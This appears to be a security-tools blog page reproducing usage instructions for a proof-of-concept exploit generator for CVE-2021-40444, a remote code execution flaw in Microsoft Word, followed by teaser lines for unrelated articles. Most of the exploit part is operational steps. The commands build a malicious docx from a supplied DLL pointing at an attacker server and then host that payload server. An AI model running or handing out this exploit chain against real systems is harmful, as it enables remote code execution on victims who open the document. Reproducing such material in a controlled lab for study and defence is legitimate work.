CVE-2021-40444 PoC is a Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)
Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)
You need to install lcab first (sudo apt-get install lcab
)
Check REPRODUCE.md
for manual reproduce steps
If your generated cab is not working, try pointing out exploit.html URL to calc.cab
First generate a malicious docx document given a DLL, you can use the one at test/calc.dll
which just pops a calc.exe
from a call to system()
python3 exploit.py generate test/calc.dll http://<SRV IP>
Once you generate the malicious docx (will be at out/
) you can setup the server:
sudo python3 exploit.py host 80
Finally try the docx in a Windows Virtual Machine:
Pystinger is a Python-based tool that enables SOCKS4 proxying and port mapping through webshells. It…
Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…
Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…
If you are working with Linux or writing bash scripts, one of the most common…
What is a bash case statement? A bash case statement is a way to control…
Why Do We Check Files in Bash? When writing a Bash script, you often work…